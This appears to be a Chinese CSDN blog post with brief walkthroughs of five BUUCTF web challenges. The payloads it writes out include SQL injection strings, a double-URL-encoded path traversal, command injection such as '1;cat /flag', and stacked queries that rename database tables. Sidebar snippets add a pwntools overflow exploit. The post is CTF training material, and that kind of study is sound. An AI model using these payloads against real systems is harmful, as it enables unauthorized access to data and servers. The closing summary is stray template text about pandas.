BUUCTF

最新推荐文章于 2024-07-21 22:49:36 发布
最新推荐文章于 2024-07-21 22:49:36 发布
阅读量69 收藏
点赞数
文章标签: php 数据库 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyw260187453/article/details/130121306
版权

BUUCTF

文章目录

一、[极客大挑战 2019]EasySQL

在这里插入图片描述
sql注入先试一下万能密码

1' or 1=1#

直接给flag了
在这里插入图片描述

二、[极客大挑战 2019]Havefun

在这里插入图片描述
F12查看源代码
在这里插入图片描述

使用get传参并且使cat=dog构造payload:

/?cat=dog

拿到flag

三、[HCTF 2018]WarmUp

在这里插入图片描述
查看源码有个文件查看一下
代码审计

 <?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)//&$page这个应该是个地址符传入参数
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//定义白名单
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(//mb_substr() 函数返回字符串的一部分这里应该是指返回两个问号之间的部分
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);//进行url解码
            $_page = mb_substr(//再次返回两个?之间的内容
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])//判断file是否为空
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

看一下hint.php
在这里插入图片描述
使用…/进行目录翻阅
首先在网页端会进行一次url解码在这个函数中也进行了一次url解码所以说我们需要对?进行两次url编码也就是%253F
构造payload

/source.php?file=source.php%253F../../../../../ffffllllaaaagggg

拿到flag
在这里插入图片描述

四、[ACTF2020 新生赛]Exec

在这里插入图片描述
使用ls查看根目录内容

1;ls /      (这里的/指的是根目录下的文件)

在这里插入图片描述
因为我们不知到flag是什么类型的文件所以不加后缀直接cat
payload:

1;cat /flag

在这里插入图片描述

五、[强网杯 2019]随便注

sql注入
在这里插入图片描述
这些都被过滤掉了使用show

爆数据库
show databases;
在这里插入图片描述
爆表
show tables;
在这里插入图片描述
爆列
show columns from 1919810931114514#
在这里插入图片描述
有个flag但这里的flag应该看不了有可能被过虑掉了
把flag换个名字在查看
构造payload

1'; rename table words to word1; rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alter table words change flag data varchar(100);#

在这里插入图片描述

提示:这里对文章进行总结:
例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。

Delancey.
关注
BUUCTF(刷题日记)
weixin_74022830的博客
03-23 992
BUUCTFweb刷题记录
BUUCTF Web [极客大挑战 2019]EasySQL & [HCTF 2018]WarmUp & [极客大挑战 2019]Havefun & [ACTF2020 新生赛]Include
网安小趴菜
08-28 335
[极客大挑战 2019]EasySQL,[HCTF 2018]WarmUp,[极客大挑战 2019]Havefun,[ACTF2020 新生赛]Include
BUUCTF靶场[Web] [极客大挑战 2019]Havefun1、[HCTF 2018]WarmUp1、[ACTF2020 新生赛]Include
m0_73981089的博客
05-22 1051
[web][极客大挑战 2019]Havefun1    考点:前端、GET传参   [web][HCTF 2018]WarmUp1    考点:代码审计、文件包含       说明      构造 payload三种方法:   [web][ACTF2020 新生赛]Include    考点:文件包含漏洞    三种编码伪协议:
刷题日记1(buuctf web题)
Aurora_lili的博客
04-16 154
但是对于该客户来说,他关心的只有石油的重量,所以石油的重量是有效载重(payload,也就是付费的重量)。SQL注入就是在用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的SQL语句就会被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。当然如果使用 ||必须需要前面是一个假的,就是前面条件为假才执行后面的,否则只执行前面的,所以可以用 a||cat /flag。也可以 1|cat /flag 1&cat /flag。
BUUCTF-EasySQL、WarmUp、Havefun、Include
m0_62905261的博客
06-07 569
目录[极客大挑战 2019]EasySQL[HCTF 2018]WarmUp[极客大挑战 2019]Havefun[ACTF2020 新生赛]Include打开靶机直接尝试万能密码,账号admin' or 1=1#,密码随意 打开靶机,里面有一个大大的表情包 按f12查看源码,发现了source.php 直接url进行访问得到了php代码 在这段代码中发现了hint.txt,仍然是url进行访问查看 发现flag在ffffllllaaaagggg中 构造payload source.php?file=h
buuctf web warmup详细题解
weixin_64160292的博客
03-31 3074
题目:warmup 题目来源:buuctf 分析过程: 1. 首先ctrl + u 查看源代码,我们发现有一个source.php文件 2. 我们打开source.php文件,是一段代码,这道题要我们代码审计。 3. 与source文件相似的hint.php文件我们也打开看一下,它说flag在ffffllllaaaagggg中。 正在上传… 4. 然后回来source.php看这段代码,通过上网查询关于php的函数的用法。然后审计代码得出,...
BUUCTF|rip
cm_zl
04-30 2128
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28808") payload = "A"*(0xf + 8) + p64(0x401198)+ p64(0x401186) io.sendline(payload) io.interactive()
BUUCTF-WEB
ccfly1012的博客
11-02 3806
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
Vue3+ element plus 前后分离admin项目安装教程
最新发布
luck332的专栏
07-21 297
前后分离admin项目安装基于 vue3.x + CompositionAPI + typescript + vite + element plus + vue-router-next + pinia,适配手机、平板、pc 的后台开源免费模板,希望减少工作量,帮助大家实现快速开发。
华为HCIP Datacom H12-821 卷42
QIN_yuexiang的博客
07-17 348
转换的第一步将FFFE插入MAC地址的公司标识和扩展标识符之间,第二步将从高位数,第7位的0改为1,1改为0。这种由MAC地址产生IPv6地址接口标识的方法可以减少配置的工作量,尤其是当采用无状态地址自动配置时,只需要获取一个IPv6前缀就可以与接口标识形成IPv6地址。已知某接口的MAC地址为OA-04-3B-45-1A-03,那么根据IEEE EUI-64规范生成的接口ID标识为:___-___-___-___-___-___-1A-03。数据链路层——ARP欺骗 网络层—Smurf攻击;
全新UI自助图文打印系统小程序源码/自助云打印机前后端源码
12年全栈程序开发
07-17 304
这些服务覆盖了多种文件格式,包括文档、图片、表格等。除此之外,系统还集成了额外的特色功能,如美颜、换装以及文档打印等,以满足用户的不同需求。管理员可进管理后台对打印机进行管理。最新的自助图文打印系统和证件照云打印小程序源码采用了PHP作为后端开发语言,旨在为用户提供全面的自助打印服务。
深入理解Linux网络(一):内核如何接收网络包
又见南风的博客
07-18 815
在上⾯的代码中跟踪函数调⽤, __igb_open => igb_request_irq => igb_request_msix , 在 igb_request_msix 中我们看到了,对于多队列的⽹卡,为每⼀个队列都注册了中断,其对应的中断处理函数是 igb_msix_ring(该函数也在 drivers/net/ethernet/intel/igb/igb_main.c 下)。如协议注册⼩节看到 inet_protos 中保存着 tcp_v4_rcv() 和 udp_rcv() 的函数地址。
[web]-反序列化-绕过__wakeup(转)
mails2008的专栏
07-18 326
终点:很直接是echo $flag,在__destruct中,username==='admin' 和 password==100。反序列化过程中发现起点在终点之前调用,反而是捣乱的,那我们就不需要自动执行__wakeup,绕过的方法,设置的字段数量比实际字段大的值。其实简单的很简单,难得也很难,慢慢学习就好,没必要焦虑,觉得很难,纯粹一个兴趣爱好就行。起点:_wakeup函数中是$this->username='guest',是给赋值;按照常规思路,寻找起点、终点、跳板。
接入百度文心一言API教程
荻酷网的博客
07-21 571
然后,编辑文章。点击AI识别摘要,然后保存即可COREAIPOWER设置暂时只支持经典编辑器.古腾堡编辑器等几个版本后支持.在比期间,你可以自己写点摘要摘要内容AL识别摘要清空。
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值